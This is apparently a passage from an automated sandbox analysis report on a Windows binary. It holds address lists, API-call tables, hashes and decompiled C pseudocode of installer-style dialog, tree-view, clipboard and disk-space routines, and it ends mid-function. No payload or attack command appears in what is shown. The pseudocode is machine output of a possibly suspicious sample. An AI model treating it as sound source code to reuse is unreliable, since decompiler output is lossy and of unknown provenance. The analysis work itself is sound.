                                                                                        0x00405234
                                                                                        0x0040526c
                                                                                        0x00000000
                                                                                        0x00405275
                                                                                        0x0040523d
                                                                                        0x00405242
                                                                                        0x00405245
                                                                                        0x00000000
                                                                                        0x00405245
                                                                                        0x0040522c
                                                                                        0x00405063
                                                                                        0x00405067
                                                                                        0x00405070
                                                                                        0x00405077
                                                                                        0x0040507a
                                                                                        0x0040507d
                                                                                        0x00405080
                                                                                        0x00405081
                                                                                        0x00405082
                                                                                        0x0040509b
                                                                                        0x0040509e
                                                                                        0x004050a8
                                                                                        0x004050b7
                                                                                        0x004050bf
                                                                                        0x004050c7
                                                                                        0x004050cc
                                                                                        0x004050cf
                                                                                        0x004050db
                                                                                        0x004050e4
                                                                                        0x004050ed
                                                                                        0x00405110
                                                                                        0x00405116
                                                                                        0x00405127
                                                                                        0x0040512c
                                                                                        0x0040513a
                                                                                        0x00405148
                                                                                        0x00405148
                                                                                        0x0040514d
                                                                                        0x0040515b
                                                                                        0x0040515b
                                                                                        0x00405160
                                                                                        0x00405163
                                                                                        0x00405168
                                                                                        0x00405174
                                                                                        0x0040517d
                                                                                        0x0040518a
                                                                                        0x00405199
                                                                                        0x0040518c
                                                                                        0x00405191
                                                                                        0x00405191
                                                                                        0x004051a5
                                                                                        0x004051a5
                                                                                        0x004051b9
                                                                                        0x004051c2
                                                                                        0x004051cb
                                                                                        0x004051db
                                                                                        0x004051e7
                                                                                        0x004051e7
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • GetDlgItem.USER32 ref: 004050A1
                                                                                        • GetDlgItem.USER32 ref: 004050B0
                                                                                        • GetClientRect.USER32 ref: 004050ED
                                                                                        • GetSystemMetrics.USER32 ref: 004050F5
                                                                                        • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405116
                                                                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405127
                                                                                        • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 0040513A
                                                                                        • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00405148
                                                                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040515B
                                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040517D
                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405191
                                                                                        • GetDlgItem.USER32 ref: 004051B2
                                                                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004051C2
                                                                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004051DB
                                                                                        • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 004051E7
                                                                                        • GetDlgItem.USER32 ref: 004050BF
                                                                                          • Part of subcall function 00403F4D: SendMessageA.USER32(00000028,?,00000001,00403D7E), ref: 00403F5B
                                                                                        • GetDlgItem.USER32 ref: 00405204
                                                                                        • CreateThread.KERNEL32 ref: 00405212
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00405219
                                                                                        • ShowWindow.USER32(00000000), ref: 0040523D
                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405242
                                                                                        • ShowWindow.USER32(00000008), ref: 00405289
                                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052BB
                                                                                        • CreatePopupMenu.USER32 ref: 004052CC
                                                                                        • AppendMenuA.USER32 ref: 004052E1
                                                                                        • GetWindowRect.USER32 ref: 004052F4
                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405318
                                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405353
                                                                                        • OpenClipboard.USER32(00000000), ref: 00405363
                                                                                        • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405369
                                                                                        • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405372
                                                                                        • GlobalLock.KERNEL32 ref: 0040537C
                                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405390
                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004053A8
                                                                                        • SetClipboardData.USER32 ref: 004053B3
                                                                                        • CloseClipboard.USER32 ref: 004053B9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                        • String ID: {
                                                                                        • API String ID: 590372296-366298937
                                                                                        • Opcode ID: 5aa5e299d21103ac010b4f938d0fd54a6532c41be376ce1bb5dd201a3ba19c05
                                                                                        • Instruction ID: b28aa7ce0402c6385ba5b6cd868a6258f1d07b471923b7bae974b2a68da01879
                                                                                        • Opcode Fuzzy Hash: 5aa5e299d21103ac010b4f938d0fd54a6532c41be376ce1bb5dd201a3ba19c05
                                                                                        • Instruction Fuzzy Hash: 34A14870904208FFDB219F60DD89AAE7F79FB08355F00417AFA05BA2A0C7795A41DF69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00404853, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 97%
                                                                                        			E00404853(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423ec8;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x423eb0 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x423eb9 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004047D3(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x423eb8) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x42047c;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x420494;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x42047c = _t315;
								 *0x420494 = _t315;
								 *0x423f00 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x423eb9 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E0040140B(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x420494;
									_t196 =  *0x423ec8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x423ecc <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x42367c + 0x10)) != _t315) {
											E004046F1(0x3ff, 0xfffffffb, E004047A6(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x423ecc);
									goto L84;
								} else {
									_t282 = E004012E2( *0x420494);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x423f00 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x420494 = GlobalAlloc(0x40,  *0x423ecc << 2);
					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
					 *0x420488 =  *0x420488 | 0xffffffff;
					_v24 = _t250;
					 *0x420490 = SetWindowLongA(_v8, 0xfffffffc, E00404E54);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42047c = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42047c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405B88(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403F18(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403F18(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x423ecc <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x420494 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x420494 + _t318 * 4) = _t274;
									_t288 =  *( *0x420494 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x423ecc);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403F4D(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403F4D(_v12);
								L89:
								return E00403F7F(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                                        0x00404871
                                                                                        0x00404877
                                                                                        0x00404879
                                                                                        0x0040487f
                                                                                        0x00404885
                                                                                        0x00404892
                                                                                        0x0040489b
                                                                                        0x0040489e
                                                                                        0x004048a1
                                                                                        0x00404ac9
                                                                                        0x00404ad0
                                                                                        0x00404ae4
                                                                                        0x00404ad2
                                                                                        0x00404ad4
                                                                                        0x00404ad7
                                                                                        0x00404ad8
                                                                                        0x00404adf
                                                                                        0x00404adf
                                                                                        0x00404af0
                                                                                        0x00404afe
                                                                                        0x00404b01
                                                                                        0x00404b17
                                                                                        0x00404b8f
                                                                                        0x00404b92
                                                                                        0x00404b94
                                                                                        0x00404b9e
                                                                                        0x00404bac
                                                                                        0x00404bac
                                                                                        0x00404bae
                                                                                        0x00404bb8
                                                                                        0x00404bbe
                                                                                        0x00404bdf
                                                                                        0x00404bc0
                                                                                        0x00404bcd
                                                                                        0x00404bcd
                                                                                        0x00404bbe
                                                                                        0x00404bb8
                                                                                        0x00000000
                                                                                        0x00404b92
                                                                                        0x00404b1c
                                                                                        0x00404b27
                                                                                        0x00404b2c
                                                                                        0x00404b33
                                                                                        0x00404b3a
                                                                                        0x00404b44
                                                                                        0x00404b44
                                                                                        0x00404b48
                                                                                        0x00404b4d
                                                                                        0x00404b52
                                                                                        0x00404b68
                                                                                        0x00404b54
                                                                                        0x00404b54
                                                                                        0x00404b5c
                                                                                        0x00404b63
                                                                                        0x00404b5e
                                                                                        0x00404b5e
                                                                                        0x00404b5e
                                                                                        0x00404b5c
                                                                                        0x00404b6c
                                                                                        0x00404b6e
                                                                                        0x00404b7c
                                                                                        0x00404b7d
                                                                                        0x00404b89
                                                                                        0x00404b8c
                                                                                        0x00404b8c
                                                                                        0x00404b4d
                                                                                        0x00000000
                                                                                        0x00404b3a
                                                                                        0x00404b1e
                                                                                        0x00404b25
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00404be2
                                                                                        0x00404be2
                                                                                        0x00404be9
                                                                                        0x00404c5d
                                                                                        0x00404c64
                                                                                        0x00404c70
                                                                                        0x00404c70
                                                                                        0x00404c79
                                                                                        0x00404c7b
                                                                                        0x00404c82
                                                                                        0x00404c85
                                                                                        0x00404c85
                                                                                        0x00404c8b
                                                                                        0x00404c92
                                                                                        0x00404c95
                                                                                        0x00404c95
                                                                                        0x00404c9b
                                                                                        0x00404ca1
                                                                                        0x00404ca7
                                                                                        0x00404ca7
                                                                                        0x00404cb4
                                                                                        0x00404e01
                                                                                        0x00404e08
                                                                                        0x00404e25
                                                                                        0x00404e2b
                                                                                        0x00404e3d
                                                                                        0x00404e3d
                                                                                        0x00000000
                                                                                        0x00404cba
                                                                                        0x00404cbc
                                                                                        0x00404cc4
                                                                                        0x00404cc8
                                                                                        0x00404cc8
                                                                                        0x00404cd0
                                                                                        0x00404d11
                                                                                        0x00404d13
                                                                                        0x00404d23
                                                                                        0x00404d26
                                                                                        0x00404d2b
                                                                                        0x00404d32
                                                                                        0x00404d35
                                                                                        0x00404dd7
                                                                                        0x00404ddd
                                                                                        0x00404deb
                                                                                        0x00404dfc
                                                                                        0x00404dfc
                                                                                        0x00000000
                                                                                        0x00404deb
                                                                                        0x00404d3b
                                                                                        0x00404d3e
                                                                                        0x00404d44
                                                                                        0x00404d49
                                                                                        0x00404d4b
                                                                                        0x00404d4d
                                                                                        0x00404d53
                                                                                        0x00404d5a
                                                                                        0x00404d5f
                                                                                        0x00404d66
                                                                                        0x00404d69
                                                                                        0x00404d69
                                                                                        0x00404d70
                                                                                        0x00404d7c
                                                                                        0x00404d80
                                                                                        0x00404d82
                                                                                        0x00404d82
                                                                                        0x00404d72
                                                                                        0x00404d74
                                                                                        0x00404d74
                                                                                        0x00404da2
                                                                                        0x00404dae
                                                                                        0x00404dbd
                                                                                        0x00404dbd
                                                                                        0x00404dbf
                                                                                        0x00404dc2
                                                                                        0x00404dcb
                                                                                        0x00000000
                                                                                        0x00404cd2
                                                                                        0x00404cdd
                                                                                        0x00404ce0
                                                                                        0x00404ce5
                                                                                        0x00404ce7
                                                                                        0x00404ceb
                                                                                        0x00404cfb
                                                                                        0x00404d05
                                                                                        0x00404d07
                                                                                        0x00404d0a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00404ced
                                                                                        0x00404ced
                                                                                        0x00404cf3
                                                                                        0x00404cf5
                                                                                        0x00404cf5
                                                                                        0x00404cf6
                                                                                        0x00404cf7
                                                                                        0x00000000
                                                                                        0x00404ced
                                                                                        0x00404cd0
                                                                                        0x00404cb4
                                                                                        0x00404bf1
                                                                                        0x00000000
                                                                                        0x00404c07
                                                                                        0x00404c11
                                                                                        0x00404c16
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00404c28
                                                                                        0x00404c2d
                                                                                        0x00404c39
                                                                                        0x00404c39
                                                                                        0x00404c3b
                                                                                        0x00404c4a
                                                                                        0x00404c4c
                                                                                        0x00404c53
                                                                                        0x00404c56
                                                                                        0x00000000
                                                                                        0x00404c56
                                                                                        0x00404bf1
                                                                                        0x004048a7
                                                                                        0x004048ac
                                                                                        0x004048b6
                                                                                        0x004048b7
                                                                                        0x004048c0
                                                                                        0x004048cb
                                                                                        0x004048d6
                                                                                        0x004048dc
                                                                                        0x004048ea
                                                                                        0x004048ff
                                                                                        0x00404904
                                                                                        0x0040490f
                                                                                        0x00404918
                                                                                        0x0040492d
                                                                                        0x0040493e
                                                                                        0x0040494b
                                                                                        0x0040494b
                                                                                        0x00404950
                                                                                        0x00404956
                                                                                        0x00404958
                                                                                        0x0040495b
                                                                                        0x00404960
                                                                                        0x00404965
                                                                                        0x00404967
                                                                                        0x00404967
                                                                                        0x00404987
                                                                                        0x00404987
                                                                                        0x00404989
                                                                                        0x0040498a
                                                                                        0x0040498f
                                                                                        0x00404992
                                                                                        0x00404995
                                                                                        0x00404999
                                                                                        0x0040499e
                                                                                        0x004049a3
                                                                                        0x004049a7
                                                                                        0x004049ac
                                                                                        0x004049b1
                                                                                        0x004049b3
                                                                                        0x004049bb
                                                                                        0x00404a85
                                                                                        0x00404a98
                                                                                        0x00000000
                                                                                        0x004049c1
                                                                                        0x004049c4
                                                                                        0x004049c7
                                                                                        0x004049ca
                                                                                        0x004049ca
                                                                                        0x004049d0
                                                                                        0x004049d6
                                                                                        0x004049d9
                                                                                        0x004049df
                                                                                        0x004049e0
                                                                                        0x004049e5
                                                                                        0x004049ee
                                                                                        0x004049f5
                                                                                        0x004049f8
                                                                                        0x004049fb
                                                                                        0x004049fe
                                                                                        0x00404a3a
                                                                                        0x00404a63
                                                                                        0x00404a3c
                                                                                        0x00404a49
                                                                                        0x00404a49
                                                                                        0x00404a00
                                                                                        0x00404a03
                                                                                        0x00404a12
                                                                                        0x00404a1c
                                                                                        0x00404a24
                                                                                        0x00404a2b
                                                                                        0x00404a33
                                                                                        0x00404a33
                                                                                        0x004049fe
                                                                                        0x00404a69
                                                                                        0x00404a6a
                                                                                        0x00404a76
                                                                                        0x00404a76
                                                                                        0x00404a83
                                                                                        0x00404a9e
                                                                                        0x00404aa2
                                                                                        0x00404abf
                                                                                        0x00404ac4
                                                                                        0x00404ac7
                                                                                        0x00000000
                                                                                        0x00404aa4
                                                                                        0x00404aa9
                                                                                        0x00404ab2
                                                                                        0x00404e3f
                                                                                        0x00404e51
                                                                                        0x00404e51
                                                                                        0x00404aa2
                                                                                        0x00000000
                                                                                        0x00404a83
                                                                                        0x004049bb

                                                                                        APIs
                                                                                        • GetDlgItem.USER32 ref: 0040486A
                                                                                        • GetDlgItem.USER32 ref: 00404877
                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 004048C3
                                                                                        • LoadBitmapA.USER32 ref: 004048D6
                                                                                        • SetWindowLongA.USER32 ref: 004048F0
                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404904
                                                                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404918
                                                                                        • SendMessageA.USER32(?,00001109,00000002), ref: 0040492D
                                                                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404939
                                                                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 0040494B
                                                                                        • DeleteObject.GDI32(?), ref: 00404950
                                                                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040497B
                                                                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404987
                                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A1C
                                                                                        • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404A47
                                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A5B
                                                                                        • GetWindowLongA.USER32 ref: 00404A8A
                                                                                        • SetWindowLongA.USER32 ref: 00404A98
                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404AA9
                                                                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404BAC
                                                                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C11
                                                                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C26
                                                                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404C4A
                                                                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C70
                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404C85
                                                                                        • GlobalFree.KERNEL32 ref: 00404C95
                                                                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D05
                                                                                        • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404DAE
                                                                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404DBD
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404DDD
                                                                                        • ShowWindow.USER32(?,00000000), ref: 00404E2B
                                                                                        • GetDlgItem.USER32 ref: 00404E36
                                                                                        • ShowWindow.USER32(00000000), ref: 00404E3D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                        • String ID: $M$N
                                                                                        • API String ID: 1638840714-813528018
                                                                                        • Opcode ID: dede86c728acf6a11cc3ab5fbc78af527f28fbd96654b5baab0c469e43695f01
                                                                                        • Instruction ID: 91af9d563adbb526dddc39620d8b288a2aea1bcbb5731436b9e02a5cfbe7d22d
                                                                                        • Opcode Fuzzy Hash: dede86c728acf6a11cc3ab5fbc78af527f28fbd96654b5baab0c469e43695f01
                                                                                        • Instruction Fuzzy Hash: AB029FB0E00209AFDB21DF54DD45AAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00404356, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 266stringCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 78%
                                                                                        			E00404356(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr* _t138;
				signed int* _t145;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x41fc70;
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E0040540B(0x3fb, _t162);
					E00405DC8(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040540B(0x3fb, _t162);
							if(E0040573A(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E00405B66(0x41f468, _t162);
							_t145 = 0;
							_t86 = E00405E88(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E00405B66(0x41f468, _t162);
								_t88 = E004056ED(0x41f468);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f468,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x41f468) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x41f468,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E004056A0(0x41f468) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x41f468) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
